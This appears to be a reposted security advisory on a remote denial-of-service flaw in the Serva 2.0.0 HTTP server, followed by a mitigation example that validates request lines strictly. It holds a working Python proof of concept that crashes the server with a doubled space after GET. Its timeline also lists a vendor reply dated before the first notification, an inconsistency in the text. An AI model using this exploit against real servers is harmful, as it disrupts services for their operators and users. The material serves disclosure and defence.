
Serva 2.0.0 HTTP Server Denial Of Service

14 Jan 2013 | Reported by Julien Ahrens | Type: packetstorm | Source: packetstormsecurity.com

Serva 2.0.0 HTTP Server Denial Of Service vulnerability in HTTP module

Code
`Inshell Security Advisory  
http://www.inshell.net  
  
  
1. ADVISORY INFORMATION  
-----------------------  
Product: Serva  
Vendor URL: www.vercot.com  
Type: Uncaught Exception [CWE-248]  
Date found: 2012-12-07  
Date published: 2013-01-14  
CVSSv2 Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)  
CVE: -  
  
  
2. CREDITS  
----------  
This vulnerability was discovered and researched by Julien Ahrens from  
Inshell Security.  
  
  
3. VERSIONS AFFECTED  
--------------------  
Serva 2.0.0, older versions may be affected too.  
  
  
4. VULNERABILITY DESCRIPTION  
----------------------------  
Serva v2.0.0 suffers from a Remote Denial of Service Vulnerability in  
the HTTP module.  
  
The application uses a space delimiter to parse a GET request. Adding  
more than one space (\x20) after the GET method will cause the  
application to crash with an unhandled C++ exception.  
  
(b50.18c): Unknown exception - code 000006d9 (first chance)  
(b50.a9c): C++ EH exception - code e06d7363 (first chance)  
(b50.a9c): C++ EH exception - code e06d7363 (!!! second chance !!!)  
eax=017d6668 ebx=00000000 ecx=00000000 edx=00000003 esi=017d66f0 edi=ffffffff  
eip=7c812afb esp=017d6664 ebp=017d66b8 iopl=0 nv up ei pl nz na pe nc  
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206  
kernel32!RaiseException+0x53:  
7c812afb 5e pop esi  
  
  
5. PROOF-OF-CONCEPT (CODE / Exploit)  
------------------------------------  
#!/usr/bin/python  
import socket  
import sys  
  
target="192.168.0.21"  
port=80  
  
# 0000 47 45 54 20 20 2f 20 48 54 54 50 2f 31 2e 31 0d GET / HTTP/1.1.  
# 0010 0a 48 6f 73 74 3a 20 68 74 74 70 3a 2f 2f 31 39 .Host: http://19  
# 0020 32 2e 31 36 38 2e 30 2e 32 31 0d 0a 43 6f 6e 74 2.168.0.21..Cont  
# 0030 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 0d ent-Length: 0...  
# 0040 0a .  
  
payload = (  
"\x47\x45\x54\x20\x20\x2f\x20\x48\x54\x54\x50\x2f\x31\x2e\x31\x0d"+  
"\x0a\x48\x6f\x73\x74\x3a\x20\x68\x74\x74\x70\x3a\x2f\x2f\x31\x39"+  
"\x32\x2e\x31\x36\x38\x2e\x30\x2e\x32\x31\x0d\x0a\x43\x6f\x6e\x74"+  
"\x65\x6e\x74\x2d\x4c\x65\x6e\x67\x74\x68\x3a\x20\x30\x0d\x0a\x0d"+  
"\x0a"  
)  
  
print "[*] Connecting to Target " + target + "..."  
  
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
try:  
    connect=s.connect((target, port))  
    print "[*] Connected to " + target + "!"  
except:  
    print "[!] " + target + " didn't respond\n"  
    sys.exit(0)  
  
print "[*] Sending malformed request..."  
  
s.send(payload)  
  
print "[!] Exploit has been sent!\n"  
s.close()  
  
  
For further Screenshots and/or PoCs visit:  
http://security.inshell.net/advisory/34  
  
  
6. SOLUTION  
-----------  
None  
  
  
7. REPORT TIMELINE  
------------------  
2012-12-07: Initial notification sent to vendor  
2012-07-18: Vendor does not accept the bug  
2013-01-14: Full Disclosure  
  
  
8. REFERENCES  
-------------  
http://security.inshell.net/advisory/34  
`
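Section 6 lists no fix, so one mitigation is to validate the request line strictly, for example in a filtering proxy placed in front of the server, and answer malformed input with an error status instead of letting a parser exception go unhandled. The following is an added example, not code from the advisory or from Serva; it checks the request-line grammar of RFC 7230, and `naive_fields`, `parse_request_line` and `MAX_LINE` are names assumed for this illustration.

```python
import re

# RFC 7230, section 3.1.1:
#   request-line = method SP request-target SP HTTP-version CRLF
# i.e. exactly one space (0x20) between three non-empty fields.
_TOKEN = rb"[!#$%&'*+\-.^_`|~0-9A-Za-z]+"
_REQUEST_LINE = re.compile(rb"(" + _TOKEN + rb") ([\x21-\x7e]+) (HTTP/\d\.\d)")
MAX_LINE = 8192  # assumed upper bound for this example


def naive_fields(line: bytes):
    """Split on every single space, as a delimiter-based parser would.
    Illustration only; this is not Serva's code."""
    return line.split(b" ")


def parse_request_line(raw: bytes):
    """Return (status, fields): 200 with the parsed fields, or the HTTP
    error status to answer with. Malformed input never raises."""
    end = raw.find(b"\r\n")
    if end == -1:
        return 400, None          # no complete request line
    if end > MAX_LINE:
        return 414, None          # request line too long
    m = _REQUEST_LINE.fullmatch(raw[:end])
    if m is None:
        return 400, None          # extra spaces, empty or missing fields
    method, target, version = (g.decode("ascii") for g in m.groups())
    return 200, {"method": method, "target": target, "version": version}


if __name__ == "__main__":
    # Constructed sample requests; the second has the doubled space
    # described in section 4.
    samples = [
        b"GET / HTTP/1.1\r\nHost: example.test\r\n\r\n",
        b"GET  / HTTP/1.1\r\nHost: example.test\r\n\r\n",
    ]
    for s in samples:
        first_line = s.split(b"\r\n")[0]
        print(naive_fields(first_line), parse_request_line(s)[0])
```

With the doubled space, the naive split yields four fields, one of them empty, which is the kind of input a delimiter-based parser has to handle explicitly; the strict check rejects it with status 400.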
